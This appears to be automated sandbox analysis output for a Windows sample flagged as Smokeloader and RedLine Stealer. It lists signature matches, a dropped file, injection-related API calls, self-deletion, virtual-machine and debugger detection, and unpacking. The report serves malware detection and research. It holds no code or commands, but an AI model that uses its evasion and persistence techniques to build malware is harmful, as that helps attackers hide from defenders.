      Source: 00000005.00000002.2004791838.0000000000560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000005.00000002.2004938818.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000005.00000002.2005144387.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000005.00000002.2004823776.0000000000570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1768955297.0000000000520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeCode function: 0_2_00403054 RtlCreateUserThread,NtTerminateProcess,0_2_00403054
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeCode function: 0_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401583
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeCode function: 0_2_00402721 NtEnumerateKey,NtClose,0_2_00402721
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeCode function: 0_2_0040158E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040158E
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeCode function: 0_2_004015BC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015BC
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 5_2_00403054 RtlCreateUserThread,NtTerminateProcess,5_2_00403054
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 5_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401583
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 5_2_00402721 NtEnumerateKey,NtClose,5_2_00402721
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 5_2_0040158E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_0040158E
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 5_2_004015BC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004015BC
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeCode function: 0_2_00401A280_2_00401A28
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 5_2_00401A285_2_00401A28
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 7_2_0040D8CA7_2_0040D8CA
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 7_2_00410CF77_2_00410CF7
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 7_2_004084F97_2_004084F9
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 7_2_004121FD7_2_004121FD
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 7_2_0041026F7_2_0041026F
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 7_2_004113EF7_2_004113EF
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 7_2_004107B37_2_004107B3
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: String function: 00407890 appears 34 times
      Source: 2Qvkmk7HGr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000002.1769193164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.1769009336.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.1768987003.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000005.00000002.2004791838.0000000000560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000005.00000002.2004938818.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000005.00000002.2005144387.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000005.00000002.2004823776.0000000000570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.1768955297.0000000000520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 2Qvkmk7HGr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: tcgiwaf.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal100.troj.evad.winEXE@3/2@72/1
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 7_2_00403690 SetLastError,SetLastError,DefineDosDeviceA,_realloc,OpenJobObjectW,InterlockedExchangeAdd,_strlen,_abort,VirtualAlloc,GetTickCount,GetTickCount,GetDiskFreeSpaceExA,ReadConsoleInputA,InterlockedExchange,GetDiskFreeSpaceExA,LoadLibraryA,ReadConsoleInputA,LCMapStringA,OpenEventA,LCMapStringA,InterlockedExchange,OpenEventA,GetCurrentProcess,GetAltTabInfoW,GetCurrentProcess,GetAltTabInfoW,GetLastError,GetLastError,GetFileAttributesW,GetShortPathNameA,GlobalFree,GetFileAttributesW,GetShortPathNameA,GlobalFree,GetEnvironmentStrings,SetComputerNameW,InterlockedExchange,LoadLibraryA,7_2_00403690
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeCode function: 0_2_00531C87 CreateToolhelp32Snapshot,Module32First,0_2_00531C87
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\tcgiwafJump to behavior
      Source: C:\Users\user\AppData\Roaming\tcgiwafCommand line argument: LiEz7_2_00403A10
      Source: C:\Users\user\AppData\Roaming\tcgiwafCommand line argument: ZV77_2_00403A10
      Source: C:\Users\user\AppData\Roaming\tcgiwafCommand line argument: b67_2_00403A10
      Source: C:\Users\user\AppData\Roaming\tcgiwafCommand line argument: y9=7_2_00403A10
      Source: C:\Users\user\AppData\Roaming\tcgiwafCommand line argument: 5Myi7_2_00403A10
      Source: C:\Users\user\AppData\Roaming\tcgiwafCommand line argument: Kn7_2_00403A10
      Source: 2Qvkmk7HGr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: 2Qvkmk7HGr.exeReversingLabs: Detection: 39%
      Source: 2Qvkmk7HGr.exeVirustotal: Detection: 41%
      Source: unknownProcess created: C:\Users\user\Desktop\2Qvkmk7HGr.exe "C:\Users\user\Desktop\2Qvkmk7HGr.exe"
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\tcgiwaf C:\Users\user\AppData\Roaming\tcgiwaf
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\tcgiwaf C:\Users\user\AppData\Roaming\tcgiwaf
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\tcgiwafSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\tcgiwafSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\tcgiwafSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Data Obfuscation

      barindex
      Detected unpacking (changes PE section rights)
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeUnpacked PE file: 0.2.2Qvkmk7HGr.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\tcgiwafUnpacked PE file: 5.2.tcgiwaf.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 7_2_0040AE2E LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,7_2_0040AE2E
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeCode function: 0_2_0040294B push ebx; ret 0_2_00402957
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeCode function: 0_2_00402923 push ebx; ret 0_2_00402926
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeCode function: 0_2_00402930 push ebx; ret 0_2_00402942
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeCode function: 0_2_0053920D push edi; iretd 0_2_00539228
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeCode function: 0_2_005333C3 push es; ret 0_2_005333C4
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeCode function: 0_2_005394E1 push edx; iretd 0_2_005395E2
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeCode function: 0_2_005395B5 push edx; iretd 0_2_005395E2
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeCode function: 0_2_00552997 push ebx; ret 0_2_005529A9
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeCode function: 0_2_0055298A push ebx; ret 0_2_0055298D
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeCode function: 0_2_005529B2 push ebx; ret 0_2_005529BE
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 5_2_0040294B push ebx; ret 5_2_00402957
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 5_2_00402923 push ebx; ret 5_2_00402926
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 5_2_00402930 push ebx; ret 5_2_00402942
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 5_2_00562997 push ebx; ret 5_2_005629A9
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 5_2_0056298A push ebx; ret 5_2_0056298D
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 5_2_005629B2 push ebx; ret 5_2_005629BE
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 5_2_0062920D push edi; iretd 5_2_00629228
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 5_2_006294E1 push edx; iretd 5_2_006295E2
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 5_2_006233C3 push es; ret 5_2_006233C4
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 5_2_006295B5 push edx; iretd 5_2_006295E2
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 7_2_004078D5 push ecx; ret 7_2_004078E8
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 7_2_00405483 push ecx; ret 7_2_00405496
      Source: 2Qvkmk7HGr.exeStatic PE information: section name: .text entropy: 7.0024890042663355
      Source: tcgiwaf.1.drStatic PE information: section name: .text entropy: 7.0024890042663355
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\tcgiwafJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\tcgiwafJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Deletes itself after installation
      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\2qvkmk7hgr.exeJump to behavior
      Hides that the sample has been downloaded from the Internet (zone.identifier)
      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\tcgiwaf:Zone.Identifier read attributes | deleteJump to behavior

      Malware Analysis System Evasion

      barindex
      Checks if the current machine is a virtual machine (disk enumeration)
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\tcgiwafKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\tcgiwafKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\tcgiwafKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\tcgiwafKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\tcgiwafKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\tcgiwafKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: C:\Users\user\AppData\Roaming\tcgiwafAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\AppData\Roaming\tcgiwafAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 450Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2613Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1030Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 363Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 372Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1947Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 883Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 875Jump to behavior
      Source: C:\Windows\explorer.exe TID: 4136Thread sleep count: 450 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 648Thread sleep count: 2613 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 648Thread sleep time: -261300s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 2588Thread sleep count: 1030 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 2588Thread sleep time: -103000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 4924Thread sleep count: 363 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 4924Thread sleep time: -36300s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 5756Thread sleep count: 335 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 8Thread sleep count: 372 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 8Thread sleep time: -37200s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 648Thread sleep count: 1947 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 648Thread sleep time: -194700s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 7_2_004032A0 GetNumberFormatW,InterlockedIncrement,SetFileAttributesW,GetCommMask,GetNumberFormatW,GetLogicalDriveStringsA,VerifyVersionInfoW,GetComputerNameA,ClearCommError,InterlockedIncrement,EnumTimeFormatsA,GetTempFileNameA,_memset,CommConfigDialogW,ReadConsoleInputA,GetVersionExW,CreateActCtxW,InterlockedExchange,InterlockedExchangeAdd,GetShortPathNameW,GetCurrencyFormatW,GetLocaleInfoW,InterlockedIncrement,SetVolumeMountPointA,GlobalUnWire,CreateSemaphoreW,7_2_004032A0
      Source: explorer.exe, 00000001.00000000.1753254303.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000001.00000000.1752481052.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
      Source: explorer.exe, 00000001.00000000.1752481052.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
      Source: explorer.exe, 00000001.00000000.1753254303.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000001.00000000.1749862002.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
      Source: explorer.exe, 00000001.00000000.1748053995.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
      Source: explorer.exe, 00000001.00000000.1749862002.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000001.00000000.1749862002.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%
      Source: explorer.exe, 00000001.00000000.1753254303.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
      Source: explorer.exe, 00000001.00000000.1749862002.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
      Source: explorer.exe, 00000001.00000000.1752481052.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
      Source: explorer.exe, 00000001.00000000.1752481052.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1752481052.000000000982D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000001.00000000.1753254303.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
      Source: explorer.exe, 00000001.00000000.1749862002.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
      Source: explorer.exe, 00000001.00000000.1752481052.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
      Source: explorer.exe, 00000001.00000000.1748053995.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
      Source: explorer.exe, 00000001.00000000.1748053995.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\tcgiwafSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\tcgiwafProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 7_2_0040540B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0040540B
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 7_2_0040AE2E LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,7_2_0040AE2E
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeCode function: 0_2_00531564 push dword ptr fs:[00000030h]0_2_00531564
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeCode function: 0_2_0055092B mov eax, dword ptr fs:[00000030h]0_2_0055092B
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeCode function: 0_2_00550D90 mov eax, dword ptr fs:[00000030h]0_2_00550D90
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 5_2_0056092B mov eax, dword ptr fs:[00000030h]5_2_0056092B
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 5_2_00560D90 mov eax, dword ptr fs:[00000030h]5_2_00560D90
